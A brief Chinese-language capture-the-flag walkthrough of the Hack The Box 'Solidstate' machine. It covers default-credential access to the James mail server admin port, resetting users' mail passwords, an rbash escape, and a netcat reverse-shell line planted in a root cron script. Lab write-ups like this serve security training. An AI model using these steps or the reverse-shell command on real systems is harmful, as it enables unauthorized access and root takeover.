HTB-Solidstate靶场
2022-12-11 16:17:1 Author: 轩公子谈技术(查看原文) 阅读量:12 收藏


端口扫描

nmap -sV  10.10.10.51

目录扫描没发现什么

在探测版本发现了james

漏洞搜索

三个脚本都失败了,这是还是需要密码的,按照之前打的靶机,25 110这些端口应该会有利用条件的

打开脚本,发现4555端口,默认用户名密码都是root,显示链接成功,但是并未反弹shell

尝试登陆4555端口

还支持改密码,这样就可以对用户全部设置密码

user: james   123user: thomas  123user: john    123user: mindy   123user: mailadmin 123

登陆邮箱

登了四个账号,发现了有价值的东西了

一个账号密码

mindy
[email protected][email protected]

登陆ssh

81ed6eec489aa915b9701c2b26298856

用的rbash,逃逸rbash

ssh [email protected]  -t bash

在root目录下存在root权限的py

支持nc,所以直接nc反弹

echo 'import os; os.system("/bin/nc 10.10.14.7 8888 -e /bin/bash")' > /opt/tmp.py

有定时任务,慢慢等,两分钟后获取root

b1257265f6a3e2a3b2ad63b95b75a1d9


文章来源: http://mp.weixin.qq.com/s?__biz=MzU3MDg2NDI4OA==&mid=2247487456&idx=1&sn=ec948a851262aa575529ed134431ea8c&chksm=fce9a82fcb9e213911cabf8dff48dda22c2210637f24a171676e36a1afa1a209deee281cc5df#rd
如有侵权请联系:admin#unsafe.sh